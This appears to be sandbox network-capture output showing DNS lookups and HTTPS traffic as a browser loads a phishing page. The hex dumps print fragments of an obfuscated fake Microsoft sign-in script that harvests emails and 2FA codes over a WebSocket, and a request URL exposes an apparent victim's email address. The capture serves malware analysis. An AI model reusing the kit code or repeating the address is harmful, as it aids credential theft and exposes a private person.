Mar 24, 2025 21:29:40.328881979 CET	1.1.1.1	192.168.2.5	0x1f35	No error (0)	shed.dual-low.s-part-0044.t-0009.t-msedge.net	s-part-0044.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 21:29:40.328881979 CET	1.1.1.1	192.168.2.5	0x1f35	No error (0)	s-part-0044.t-0009.t-msedge.net		13.107.246.72	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:52.036102057 CET	1.1.1.1	192.168.2.5	0xdb3e	No error (0)	server1.linxcoded.top		185.174.100.76	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:52.117459059 CET	1.1.1.1	192.168.2.5	0x1acc	Name error (3)	_8248._https.server1.linxcoded.top	none	none	65	IN (0x0001)	false
Mar 24, 2025 21:29:53.696115971 CET	1.1.1.1	192.168.2.5	0x8448	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:53.696115971 CET	1.1.1.1	192.168.2.5	0x8448	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:53.696115971 CET	1.1.1.1	192.168.2.5	0x8448	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:53.696176052 CET	1.1.1.1	192.168.2.5	0x2b41	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 24, 2025 21:29:54.380347013 CET	1.1.1.1	192.168.2.5	0x50e6	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:54.380347013 CET	1.1.1.1	192.168.2.5	0x50e6	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:54.380347013 CET	1.1.1.1	192.168.2.5	0x50e6	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:29:54.381361008 CET	1.1.1.1	192.168.2.5	0xc5b5	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 24, 2025 21:30:04.920557022 CET	1.1.1.1	192.168.2.5	0x3180	No error (0)	avcbtech.site		104.168.138.190	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:30:16.107558966 CET	1.1.1.1	192.168.2.5	0x7182	No error (0)	avcbtech.site		104.168.138.190	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:31:06.417301893 CET	1.1.1.1	192.168.2.5	0x4336	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:31:06.417301893 CET	1.1.1.1	192.168.2.5	0x4336	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:31:06.417301893 CET	1.1.1.1	192.168.2.5	0x4336	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:31:06.417803049 CET	1.1.1.1	192.168.2.5	0xa3da	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 24, 2025 21:31:19.834511042 CET	1.1.1.1	192.168.2.5	0xa4	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 24, 2025 21:31:19.835410118 CET	1.1.1.1	192.168.2.5	0x2d92	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:31:19.835410118 CET	1.1.1.1	192.168.2.5	0x2d92	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:31:19.835410118 CET	1.1.1.1	192.168.2.5	0x2d92	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:31:32.717432976 CET	1.1.1.1	192.168.2.5	0xa5e5	No error (0)	www.google.com		142.250.81.228	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:31:32.717453957 CET	1.1.1.1	192.168.2.5	0xc383	No error (0)	www.google.com			65	IN (0x0001)	false
Mar 24, 2025 21:32:17.631124973 CET	1.1.1.1	192.168.2.5	0xa398	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:32:17.631124973 CET	1.1.1.1	192.168.2.5	0xa398	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:32:17.631124973 CET	1.1.1.1	192.168.2.5	0xa398	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 24, 2025 21:32:17.632100105 CET	1.1.1.1	192.168.2.5	0x6562	No error (0)	api.ipify.org			65	IN (0x0001)	false

HTTP Request Dependency Graph

office.avcbtech.store

sender.linxcoded.top

code.jquery.com

i.imgur.com

api.ipify.org

avcbtech.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49731	139.28.36.38	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:29:34 UTC	572	OUT	GET /kuk/xls/k1u2k.js?uid=krista.wiebe@umanitoba.ca HTTP/1.1 Host: office.avcbtech.store Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:29:35 UTC	396	IN	HTTP/1.1 200 OK Server: nginx/1.26.3 Date: Mon, 24 Mar 2025 20:29:35 GMT Content-Type: application/javascript Content-Length: 68421 Last-Modified: Fri, 14 Mar 2025 13:25:44 GMT Connection: close ETag: "67d42e58-10b45" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Access-Control-Allow-Origin: * Cache-Control: public, must-revalidate Accept-Ranges: bytes
2025-03-24 20:29:35 UTC	15988	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 31 31 62 28 29 7b 76 61 72 20 5f 30 78 35 30 64 36 39 35 3d 5b 27 23 62 61 63 6b 27 2c 27 49 6e 63 6f 72 72 65 63 74 5c 78 32 30 32 46 41 5c 78 32 30 63 6f 64 65 2e 5c 78 32 30 54 72 79 5c 78 32 30 61 67 61 69 6e 2e 27 2c 27 64 69 76 36 27 2c 27 23 62 61 63 6b 2d 74 65 78 74 27 2c 27 74 79 70 65 27 2c 27 4d 69 63 72 6f 73 6f 66 74 27 2c 27 72 65 6c 61 79 27 2c 27 36 6b 67 6a 58 4c 43 27 2c 27 73 74 79 6c 65 27 2c 27 70 61 67 65 5f 76 69 73 69 74 27 2c 27 63 6c 6f 73 65 27 2c 27 61 70 70 72 6f 76 65 5f 73 69 67 6e 69 6e 27 2c 27 64 69 76 35 27 2c 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 66 66 69 63 65 2e 63 6f 6d 27 2c 27 23 63 61 70 74 63 68 61 2d 62 74 6e 27 2c 27 2e 6c 6f 67 6f 6e 61 6d 65 27 2c 27 64 69 73 61 62 Data Ascii: function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disab
2025-03-24 20:29:35 UTC	16384	IN	Data Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 31 36 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 6f 6c 6f 72 3a 5c 78 32 30 72 67 62 28 35 31 2c 5c 78 32 30 35 31 2c 5c 78 32 30 35 31 29 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 Data Ascii: \x20\x20\x20\x20\x20\x20\x20font-size:\x2016px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20rgb(51,\x2051,\x2051);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
2025-03-24 20:29:35 UTC	16384	IN	Data Raw: 32 32 3e 3c 70 5c 78 32 30 69 64 3d 5c 78 32 32 61 70 70 72 6f 76 65 2d 6e 75 6d 62 65 72 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 68 33 5c 78 32 30 74 65 78 74 2d 63 65 6e 74 65 72 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 62 6f 72 64 65 72 3a 5c 78 32 30 32 70 78 5c 78 32 30 73 6f 6c 69 64 5c 78 32 30 62 6c 61 63 6b 3b 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 34 30 70 78 3b 5c 78 32 30 70 61 64 64 69 6e 67 3a 5c 78 32 30 31 32 70 78 5c 78 32 30 31 32 70 78 3b 5c 78 32 30 74 65 78 74 2d 61 6c 69 67 6e 3a 5c 78 32 30 63 65 6e 74 65 72 3b 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 5c 78 32 32 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 27 2c 27 3c 61 5c 78 32 30 68 72 65 66 Data Ascii: 22><p\x20id=\x22approve-number\x22\x20class=\x22h3\x20text-center\x22\x20style=\x22border:\x202px\x20solid\x20black;\x20font-size:\x2040px;\x20padding:\x2012px\x2012px;\x20text-align:\x20center;\x20display:\x20inline-block;\x22></p></div><br>','<a\x20href
2025-03-24 20:29:35 UTC	16384	IN	Data Raw: 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 5f 30 78 34 64 34 61 64 61 28 30 78 32 34 62 29 29 2c 5f 30 78 35 66 63 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 27 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 67 72 6f 75 70 5c 78 32 30 6d 74 2d 32 5c 78 32 32 3e 3c 69 6e 70 75 74 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 65 6d 61 69 6c 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 5c 78 32 30 72 6f 75 6e 64 65 64 2d 30 5c 78 32 30 62 6f 72 64 65 72 2d 64 61 72 6b 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 5c 78 Data Ascii: 214[_0x4d4ada(0x188)](_0x4d4ada(0x24b)),_0x5fc214[_0x4d4ada(0x188)]('<div\x20class=\x22form-group\x20mt-2\x22><input\x20type=\x22email\x22\x20name=\x22ai\x22\x20class=\x22form-control\x20rounded-0\x20border-dark\x22\x20id=\x22ai\x22\x20aria-describedby=\x
2025-03-24 20:29:35 UTC	3281	IN	Data Raw: 28 27 23 6d 73 67 2d 32 66 61 27 29 5b 5f 30 78 32 38 35 37 35 66 28 30 78 31 62 37 29 5d 28 5f 30 78 32 38 35 37 35 66 28 30 78 31 39 32 29 29 3b 7d 7d 5f 30 78 31 36 38 65 66 33 28 29 3b 7d 2c 27 65 72 72 6f 72 27 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 34 61 33 65 36 3d 5f 30 78 31 38 63 32 37 61 3b 24 28 5f 30 78 34 34 61 33 65 36 28 30 78 31 62 39 29 29 5b 27 74 65 78 74 27 5d 28 5f 30 78 34 34 61 33 65 36 28 30 78 31 62 38 29 29 2c 5f 30 78 31 36 38 65 66 33 28 29 3b 7d 7d 29 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 5f 30 78 31 30 37 31 66 32 3d 6e 65 77 20 57 65 62 53 6f 63 6b 65 74 28 5f 30 78 31 38 63 32 37 61 28 30 78 31 64 63 29 29 3b 5f 30 78 31 30 37 31 66 32 5b 5f 30 78 31 38 63 32 37 61 28 30 78 32 33 38 29 5d 3d 66 75 6e 63 Data Ascii: ('#msg-2fa')[_0x28575f(0x1b7)](_0x28575f(0x192));}}_0x168ef3();},'error':function(){var _0x44a3e6=_0x18c27a;$(_0x44a3e6(0x1b9))['text'](_0x44a3e6(0x1b8)),_0x168ef3();}});else{const _0x1071f2=new WebSocket(_0x18c27a(0x1dc));_0x1071f2[_0x18c27a(0x238)]=func

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49732	185.174.100.20	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:29:36 UTC	566	OUT	GET /start/xls/includes/css6.css HTTP/1.1 Host: sender.linxcoded.top Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:29:37 UTC	383	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Mon, 24 Mar 2025 20:29:36 GMT Content-Type: text/css Content-Length: 258966 Last-Modified: Mon, 27 Jan 2025 22:21:00 GMT Connection: close ETag: "679806cc-3f396" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Access-Control-Allow-Origin: * Cache-Control: public, must-revalidate Accept-Ranges: bytes
2025-03-24 20:29:37 UTC	16001	IN	Data Raw: 20 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 0d 0a 20 20 20 20 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 2d 62 6c 75 65 3a 20 23 30 30 37 Data Ascii: /! Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ :root { --blue: #007
2025-03-24 20:29:37 UTC	16384	IN	Data Raw: 75 70 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 34 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 34 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 35 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 35 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 36 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 37 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 36 3b 0d Data Ascii: up: 5; -ms-flex-order: 4; order: 4 } .order-5 { -webkit-box-ordinal-group: 6; -ms-flex-order: 5; order: 5 } .order-6 { -webkit-box-ordinal-group: 7; -ms-flex-order: 6;
2025-03-24 20:29:37 UTC	16384	IN	Data Raw: 65 78 2d 6f 72 64 65 72 3a 20 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 39 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 30 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 31 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 31 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 31 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 31 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 32 3b 0d 0a 20 Data Ascii: ex-order: 9; order: 9 } .order-lg-10 { -webkit-box-ordinal-group: 11; -ms-flex-order: 10; order: 10 } .order-lg-11 { -webkit-box-ordinal-group: 12;
2025-03-24 20:29:37 UTC	16384	IN	Data Raw: 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 2e 62 74 6e 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 74 65 78 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 73 6d 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2c 0d 0a 20 20 20 20 2e 69 6e Data Ascii: roup-prepend>.form-control-plaintext.btn, .input-group-sm>.input-group-prepend>.form-control-plaintext.input-group-text { padding-right: 0; padding-left: 0 } .form-control-sm, .input-group-sm>.form-control, .in
2025-03-24 20:29:37 UTC	16384	IN	Data Raw: 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 35 34 35 62 36 32 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 34 65 35 35 35 62 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 73 68 6f 77 3e 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 3a 66 6f 63 75 73 20 7b Data Ascii: ; background-color: #545b62; border-color: #4e555b } .btn-secondary:not(:disabled):not(.disabled).active:focus, .btn-secondary:not(:disabled):not(.disabled):active:focus, .show>.btn-secondary.dropdown-toggle:focus {
2025-03-24 20:29:37 UTC	16384	IN	Data Raw: 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 74 72 2e 63 6f 6c 6c 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 72 6f 77 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 74 62 6f 64 79 2e 63 6f 6c 6c 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 72 6f 77 2d 67 72 6f 75 70 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 6f 6c 6c 61 70 73 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 6f 76 Data Ascii: apse.show { display: block } tr.collapse.show { display: table-row } tbody.collapse.show { display: table-row-group } .collapsing { position: relative; height: 0; ov
2025-03-24 20:29:37 UTC	16384	IN	Data Raw: 72 61 64 69 6f 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 2c 25 33 43 73 76 67 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 2d 34 20 2d 34 20 38 20 38 27 25 33 45 25 33 43 63 69 72 63 6c 65 20 72 3d 27 33 27 20 66 69 6c 6c 3d 27 25 32 33 66 66 66 27 2f 25 33 45 25 33 43 2f 73 76 67 25 33 45 22 29 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 Data Ascii: radio .custom-control-input:checked~.custom-control-label::after { background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='3' fill='%23fff'/%3E%3C/svg%3E") }
2025-03-24 20:29:37 UTC	16384	IN	Data Raw: 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 6e 6f 77 72 61 70 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 77 65 62 6b 69 74 2d 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 6d 73 2d 66 6c 65 78 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 72 65 66 65 72 72 Data Ascii: d { -ms-flex-wrap: nowrap; flex-wrap: nowrap } .navbar-expand .navbar-collapse { display: -webkit-box !important; display: -ms-flexbox !important; display: flex !important; -ms-flex-preferr
2025-03-24 20:29:37 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 39 65 63 65 66 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 2e 33 72 65 6d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 34 72 65 6d 20 32 72 65 6d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6a 75 6d 62 6f 74 72 6f 6e 2d 66 6c 75 69 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b Data Ascii: background-color: #e9ecef; border-radius: .3rem } @media (min-width:576px) { .jumbotron { padding: 4rem 2rem } } .jumbotron-fluid { padding-right: 0; padding-left: 0;
2025-03-24 20:29:37 UTC	16384	IN	Data Raw: 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 2c 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 2e 34 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 2e 38 72 65 6d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 61 75 74 6f 5b 78 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 2c 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 Data Ascii: t^=right] .arrow, .bs-tooltip-right .arrow { left: 0; width: .4rem; height: .8rem } .bs-tooltip-auto[x-placement^=right] .arrow::before, .bs-tooltip-right .arrow::before { right: 0; border

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49735	151.101.66.137	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
